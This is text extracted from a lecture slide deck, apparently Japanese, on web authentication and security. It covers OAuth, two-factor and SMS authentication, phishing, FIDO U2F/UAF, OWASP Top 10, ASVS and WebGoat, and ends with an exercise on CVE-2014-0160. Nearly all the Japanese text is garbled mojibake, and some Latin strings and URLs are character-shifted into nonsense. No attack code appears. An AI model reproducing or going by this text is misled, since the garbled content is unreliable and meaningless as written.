͜ΕͰύεϫʔυΛΑΓ؆୯ʹ͍ͯ͠ΔΑ͏ͳͷͰ͋Δ
͖ͳ৯
ͳΜͰ͔͢
Alice
Aliceͷ;ΓΛ͢Δ
ѱҙ͋Δୈࡾऀ
ਖ਼ղ
ύεϫʔυΛઃఆ͍ͯͩ͘͠͠͞
Slide 190
Slide 190 text
OAuthೝূ
ଟ͘ͷϢʔβ
Googleɺfacebookͷ
ΞΧϯτΛ͍࣋ͬͯΔ
αʔϏε
͕ࣗͲΜͳใΛ
ඞཁͱ͍ͯ͠Δ͔Λొ͢Δ
Ϣʔβͨ͘͞ΜͷαʔϏεΛར༻͍ͯ͠Δ
ͦΕΒʹݸผʹύεϫʔυΛઃఆ͍ͯͨ͠Β
ύεϫʔυΛΕͯ͠·͏ͷવͰ͋Δ
Slide 191
Slide 191 text
OAuthೝূ
͋ͷαʔϏε
͋ͷαʔϏεʹ
ϩάΠϯ͍ͨ͠
͋ͷαʔϏεʹ
͜Ε͚ͩͷใΛ͚͢ͲOK?
OK
͋ͷαʔϏεʹ
ϦΫΤεττʔΫϯ***Λ
͍ͯͩ͘͠͞
Slide 192
Slide 192 text
OAuthೝূ
͋ͷαʔϏε
ϦΫΤεττʔΫϯ***
Ͱ͢
ϦΫΤεττʔΫϯ***
ͱ͔͍͏ͷ͕དྷͨΜ͚ͩͲ
ͦͷਓ͏ͪͷAlice͞ΜͳͷͰ
௨͍ͯ͋͛ͯͩ͘͠͞
Alice͞ΜͷৄࡉΛΓ͍ͨ߹
ΞΫηετʔΫϯ???Λ͍ͬͯͩ͘͞
Slide 193
Slide 193 text
͜͜ʹ
χίχίಈըͷ
ϩάΠϯը໘ΛషΔ
Ϣʔβීஈ͍ͬͯΔSNSʹ
ϩάΠϯ͢ΕαʔϏεΛར༻Ͱ͖Δ
αʔϏεຖʹ
ύεϫʔυΛ֮͑Δඞཁ
αʔϏεຖʹύεϫʔυΛೖྗ͢Δඞཁͳ͍
αʔϏεఏڙऀ
۩ମతͳϢʔβೝূΛ
ΑͦͷαʔϏεʹؙ͛Ͱ͖Δ
͜͏͍͏ͷ
OAuthೝূ
OAuthೝূΛ׆༻͍ͯ͠ΔαʔϏεͷྫ χίχίಈը
https://account.nicovideo.jp/login
Slide 194
Slide 194 text
2ཁૉೝূ
Ϣʔβ͕ຊͰ͋Δ͜ͱΛ֬ೝ͢Δखஈ3ͭʹྨͰ͖Δ
1.ϢʔβԿΛ͍ͬͯΔ͔
ύεϫʔυೝূ
2.ϢʔβԿͰ͋Δ͔
ࢦೝূ
3.ϢʔβԿΛ͍࣋ͬͯΔ͔
ূͷఏࣔ
1Ҏ֎ಛผͳஔΛཁ͢Δҝ
ैདྷଟ͘ͷΠϯλʔωοτ্ͷαʔϏε1͚ͩΛ͖ͬͯͨ
Slide 195
Slide 195 text
ϑΟογϯά
ຊͷαʔϏε
ِͷαʔϏε
ύεϫʔυ
Ͱ͢
ύεϫʔυ
Ͱ͢
ύεϫʔυ
Ͱ͢
Ϣʔβ͕ԿΛ͍ͬͯΔ͔
ϑΟογϯάʹର͢Δੑ͕ͳ͍
Slide 196
Slide 196 text
2ཁૉೝূ
Ϣʔβ͕ຊͰ͋Δ͜ͱΛ֬ೝ͢Δखஈ3ͭʹྨͰ͖Δ
1.ϢʔβԿΛ͍ͬͯΔ͔
ύεϫʔυೝূ
2.ϢʔβԿͰ͋Δ͔
ࢦೝূ
3.ϢʔβԿΛ͍࣋ͬͯΔ͔
ূͷఏࣔ
2ͱ3ͷ͍ͣΕ͔Λซ༻ͯ͠ͳΓ͢·͠Λ͙ඞཁ͕͋Δ
Slide 197
Slide 197 text
SMSΛར༻ͨ͠2ཁૉೝূ
3.ϢʔβԿΛ͍࣋ͬͯΔ͔
Ϣʔβొ͞Ε͍ͯΔܞଳిΛ͍࣋ͬͯΔ͔
ύεϫʔυ
Ͱ͢
4.4ʹૹͬͨ൪߸Λ
ೖྗ͍ͯͩ͘͠͞
ϩάΠϯޭ
Slide 198
Slide 198 text
SMSΛར༻ͨ͠2ཁૉೝূͷ
ύεϫʔυ
Ͱ͢
ѱҙ͋Δୈࡾऀ͕SMSΛ͖ݟͰ͖ͨΒ
ೝূΛಥഁ͞ΕΔ
ͦͦ൪߸ೖྗ͢Δͷ
ΊΜͲ͍͘͞
ͬͱ҆શ͔ͭखܰʹ
2ཁૉೝূ͢ΔͨΊͷಓ۩
࡞Εͳ͍ͩΖ͏͔
Slide 199
Slide 199 text
FIDO U2F
https://www.yubico.com/products/yubikey-hardware/
Ϣʔβ͕͔֬ʹ͜ͷUSBσόΠεΛ͍࣋ͬͯΔࣄΛ
ެ։伴҉߸Λͬͯূ໌͢Δஔ
͜͜ʹ
࣮ࡍʹചΒΕ͍ͯΔ'*%06'ͷσόΠεͷը૾ΛషΔ
Slide 200
Slide 200 text
FIDO U2FͰϢʔβొ
Ϣʔβొ
AppIDΛఴ͑ͯ伴ੜΛཁٻ
"QQ*%ʹରԠ͢Δ
ൿີ伴ͱެ։伴Λ࡞Δ
ެ։伴ͱೝূثূ໌ॻͱ
ೝূثূ໌ॻͰ࡞ͬͨॺ໊Λฦ͢
ॺ໊Λͬͯ
৴པͰ͖ΔೝূثͰ͋ΔࣄΛ֬ೝ
ެ։伴Λอଘ
ొྃ
Slide 201
Slide 201 text
FIDO U2FͰϩάΠϯ
ύεϫʔυೝূ
"QQ*%ʹରԠ͢Δ
ൿີ伴ͰDIBMMFOHFΛ҉߸Խ
҉߸Խͨ͠challengeΛฦ͢
อଘͯ͋͠Δެ։伴Ͱ
DIBMMFOHFΛ෮߸Ͱ͖ΔࣄΛ֬ೝ
ೝূྃ
ύεϫʔυΛ֬ೝ
AppIDͱchallengeΛૹ৴
Slide 202
Slide 202 text
FIDO UAF
ͦͦύεϫʔυΛೖྗ͢Δͷ͕ΊΜͲ͍͘͞
1.ϢʔβԿΛ͍ͬͯΔ͔
ύεϫʔυೝূ
2.ϢʔβԿͰ͋Δ͔
ࢦೝূ
3.ϢʔβԿΛ͍࣋ͬͯΔ͔
ূͷఏࣔ
1ΛΘͣʹ2ͱ3Ͱ2ཁૉೝূ͠Α͏
Slide 203
Slide 203 text
FIDO UAF
ੜମೝূ͕ඞཁʹͳΔͨΊෳࡶͳϋʔυΣΞ͕ඞཁʹͳΔ͕
Xperia XZ1͕FIDO UAF 1.1ʹ४ڌͨ͠ॳͷσόΠεʹͳͬͨࣄΛใ͡Δهࣄ
https://fidoalliance.org/first-fido-uaf-1-1-implementations-ease-deployment-
advanced-biometric-authentication-android-devices/
αʔϏε͕FIDO UAFʹରԠ͢Δ͜ͱͰ
͜͏ͨ͠σόΠεͷϢʔβʹύεϫʔυෆཁͷೝূΛఏڙͰ͖Δ
͜͜ʹ
9QFSJB9;͕'*%06"'ʹ४ڌͨ͜͠ͱΛใ͡ΔهࣄΛషΔ
Slide 204
Slide 204 text
Webϖʔδʹର͢Δ
߈ܸʹඋ͑Δ
Slide 205
Slide 205 text
OWASP
https://www.owasp.org/
҆શͳWebΞϓϦέʔγϣϯͷҝͷใͷڞ༗ܒൃΛߦ͏
ΦʔϓϯίϛϡχςΟ
͜͜ʹ
08"41ͷτοϓϖʔδΛషΔ
Slide 206
Slide 206 text
OWASP Top 10
WebΞϓϦέʔγϣϯ։ൃऀͷҙשىΛతͱͯ͠
WebΞϓϦέʔγϣϯͷදతͳ੬ऑੑΛ10छྨબΜͩͷ
https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf
࠷৽൛OWASP Top 10 2017Ͱຊޠ༁ଘࡏ͢Δ
͜͜ʹ
08"415PQͷදࢴΛషΔ
Slide 207
Slide 207 text
OWASP Top 10
ΠϯδΣΫγϣϯ
ೝূͷෆඋ
ػඍͳใͷ࿐ग़
9.-֎෦ΤϯςΟςΟࢀর
ΞΫηε੍ޚͷෆඋ
ෆదͳηΩϡϦςΟઃఆ
ΫϩεαΠτεΫϦϓςΟϯά
҆શͰͳ͍σγϦΞϥΠθʔγϣϯ
طͷ੬ऑੑͷ͋Δίϯϙʔωϯτͷ༻
ෆेͳϩΪϯάͱϞχλϦϯά
Slide 208
Slide 208 text
͜͜ʹ
08"415PQͷΠϯδΣΫγϣϯͷղઆΛషΔ
OWASP Top 10
https://www.owasp.org/images/2/23/
OWASP_Top_10-2017%28ja%29.pdf
੬ऑੑͷछྨຖʹ
ͲͷΑ͏ʹൃݟ͢Εྑ͍͔
ͲͷΑ͏ʹࢭ͢Εྑ͍͔
͕వΊΒΕ͍ͯΔ
ΠϯδΣΫγϣϯʹର͢Δࢭํ๏
ΠϯλϓϦλ͔ΒΫΤϦΛ͛ͳ͍
ύϥϝʔλԽ͞ΕͨΠϯλʔϑΣʔε
·ͨORMΛ͏
ಡ͏
Slide 209
Slide 209 text
͜͜ʹ
08"41"474ͷදࢴΛషΔ
OWASP Application Security Verification Standard
WebΞϓϦέʔγϣϯͷ҆શੑΛݕূ͢ΔͨΊʹ
νΣοΫ͖߲͢Λ·ͱΊͨͷ
࠷৽൛OWASP ASVS 3.0.1Ͱຊޠ༁ଘࡏ͢Δ
IUUQTXXXKQDFSUPSKQTFDVSFDPEJOHNBUFSJBMTPXBTQBTWTIUNM
Slide 210
Slide 210 text
͜͜ʹ
08"41"474ͷνΣοΫ߲ͷҰ෦ΛషΔ
OWASP Application Security Verification Standard
IUUQTXXXKQDFSUPSKQTFDVSFDPEJOH
NBUFSJBMTPXBTQBTWTIUNM
͋ΒΏΔΞϓϦέʔγϣϯ͕ຬ͖ͨ͢Ϩϕϧ1
ݸਓใվ͟Μ͞ΕΔͱࠔΔใΛѻ͏
ΞϓϦέʔγϣϯ͕ຬ͖ͨ͢Ϩϕϧ2
োͷൃੜ͕৫ͷଘଓਓ໋ʹؔΘΔ
ΞϓϦέʔγϣϯ͕ຬ͖ͨ͢Ϩϕϧ3
Ϩϕϧ্͕͕Δ΄ͲνΣοΫ߲͕૿͑Δ
ύεϫʔυมߋػೳʹ
ݹ͍ύεϫʔυͷೖྗ
৽͍͠ύεϫʔυͷೖྗ
৽͍͠ύεϫʔυͷ֬ೝ
ͷ3ͭΛཁٻ͍ͯ͠Δ͔Ͳ͏͔ΛνΣοΫ
WebΞϓϦέʔγϣϯΛ࡞ͬͨΒ
νΣοΫ͠Α͏
Slide 211
Slide 211 text
͜͜ʹ
08"418FC(PBUͷը૾ΛషΔ
OWASP WebGoat
https://github.com/WebGoat/WebGoat
JavaͰॻ͔ΕͨWebΞϓϦέʔγϣϯ
ҙਤతʹ༷ʑͳ੬ऑੑ͕ࠐ·Ε͍ͯΔ
੬ऑੑΛ࣮ફతʹֶͼ͍ͨ
ࣗͷߦͳ͍ͬͯΔ੬ऑੑͷνΣοΫ͕
ਖ਼͍͔͔֬͠Ί͍ͨ
ͦ͏͍͏࣌ʹ͑Δ
Slide 212
Slide 212 text
࠷ޙʹ
Slide 213
Slide 213 text
͋ΒΏΔιϑτΣΞηΩϡϦςΟ
ཧతͳηΩϡϦςΟΛલఏͱ͍ͯ͠Δ
ѱҙ͋Δୈࡾऀ͕αʔόϧʔϜʹ৵ೖͯ͠ిݯέʔϒϧΛൈ͘͜ͱͰ
αʔϏεΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ੬ऑੑ
·ͣށకΓ
ιϑτΣΞηΩϡϦςΟͦΕ͔Βͩ
͜ͷΑ͏ͳ߈ܸʹରͯ͠ιϑτΣΞجຊతʹଧͭख͕ͳ͍
Slide 214
Slide 214 text
՝
CVE-2014-0160
͜ͷ੬ऑੑ͕Ͳ͏͍͏࣌ʹԿ͕ى͜ΔͷͰ
ͦͷ݁ՌͲͷΑ͏ͳѱӨڹ͕༧͞ΕΔ͔Λઆ໌͍ͯͩ͘͠͞
͜ͷ੬ऑੑΛճආ͢ΔͨΊʹͱΓ͏ΔରԠΛ1ͭҎ্ड़͍ͯͩ͘͞